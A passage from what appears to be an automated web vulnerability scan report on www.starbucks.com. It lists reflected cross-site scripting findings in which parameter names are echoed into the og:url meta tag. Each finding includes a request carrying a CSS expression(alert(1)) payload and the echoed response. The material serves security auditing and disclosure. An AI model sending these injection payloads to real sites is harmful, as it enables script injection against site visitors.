This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse?e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:39:22 GMT
Connection: close
Content-Length: 51155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse?e95fa"style="x:expression(alert(1))"75289b27baf=1"/> ...[SNIP]...
3.31. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/community
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e306b"style="x:expression(alert(1))"0add0d892c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/community?e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:11 GMT
Connection: close
Content-Length: 41531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?e306b"style="x:expression(alert(1))"0add0d892c7=1"/> ...[SNIP]...
3.32. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/community/mystarbucksidea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fb2f"style="x:expression(alert(1))"d8b67fa78b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/community/mystarbucksidea?6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:51:50 GMT
Connection: close
Content-Length: 41586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?6fb2f"style="x:expression(alert(1))"d8b67fa78b9=1"/> ...[SNIP]...
3.33. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/entertainment
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c416"style="x:expression(alert(1))"6c5f6b29f5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/entertainment?1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:05 GMT
Connection: close
Content-Length: 53500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?1c416"style="x:expression(alert(1))"6c5f6b29f5d=1"/>
...[SNIP]...
3.34. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/mobile-apps
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48dbe"style="x:expression(alert(1))"2be3e39534b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/mobile-apps?48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:51 GMT
Connection: close
Content-Length: 42056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?48dbe"style="x:expression(alert(1))"2be3e39534b=1"/>
...[SNIP]...
3.35. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/mobile-apps/mystarbucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26134"style="x:expression(alert(1))"dc4b3c470d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/mobile-apps/mystarbucks?26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:06 GMT
Connection: close
Content-Length: 37880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?26134"style="x:expression(alert(1))"dc4b3c470d=1"/>
...[SNIP]...
3.36. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/mobile-apps/starbucks-card-mobile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 462d1"style%3d"x%3aexpression(alert(1))"ac69f70948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 462d1"style="x:expression(alert(1))"ac69f70948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style%3d"x%3aexpression(alert(1))"ac69f70948=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:56 GMT
Connection: close
Content-Length: 39150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style="x:expression(alert(1))"ac69f70948=1"/>
...[SNIP]...
3.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/mobile-apps/starbucks-card-mobile-bb
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload de919"style%3d"x%3aexpression(alert(1))"904c963c339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de919"style="x:expression(alert(1))"904c963c339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style%3d"x%3aexpression(alert(1))"904c963c339=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:31 GMT
Connection: close
Content-Length: 39649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style="x:expression(alert(1))"904c963c339=1"/>
...[SNIP]...
3.38. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/store-design
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b663f"style="x:expression(alert(1))"fd0669f60f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/store-design?b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:45 GMT
Connection: close
Content-Length: 44147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?b663f"style="x:expression(alert(1))"fd0669f60f4=1"/>
...[SNIP]...
3.39. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/wireless-internet
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8449"style="x:expression(alert(1))"73d4ee3cd6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/wireless-internet?a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:32 GMT
Connection: close
Content-Length: 37927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a8449"style="x:expression(alert(1))"73d4ee3cd6d=1"/>
...[SNIP]...
3.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffeehouse/wireless-internet/in-canada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc3da"style="x:expression(alert(1))"1f3227134dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/wireless-internet/in-canada?fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:09 GMT
Connection: close
Content-Length: 38207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?fc3da"style="x:expression(alert(1))"1f3227134dc=1"/>
...[SNIP]...
3.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f393"style="x:expression(alert(1))"bf3de1874fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /coffeehouse/wireless-internet/starbucks-digital-network?6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:41:08 GMT
Connection: close
Content-Length: 38665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?6f393"style="x:expression(alert(1))"bf3de1874fc=1"/>
...[SNIP]...
3.42. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload e5d09"style%3d"x%3aexpression(alert(1))"17035a06782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5d09"style="x:expression(alert(1))"17035a06782 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /customer-service/contact?e5d09"style%3d"x%3aexpression(alert(1))"17035a06782=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:47 GMT
Connection: close
Content-Length: 37097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/contact?e5d09"style="x:expression(alert(1))"17035a06782=1"/>
...[SNIP]...
3.43. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /customer-service/faqs/card
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (here the content attribute of the page's og:url meta tag). The payload 51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51bc5"style="x:expression(alert(1))"c6d67963f2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expression() and so is specific to Internet Explorer (IE7 and earlier, or later versions rendering in IE7 compatibility mode); it will not work on other browsers, although the underlying defect, reflection of the URL-decoded parameter name into an attribute value without HTML encoding, is browser-independent.
Request
GET /customer-service/faqs/card?51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
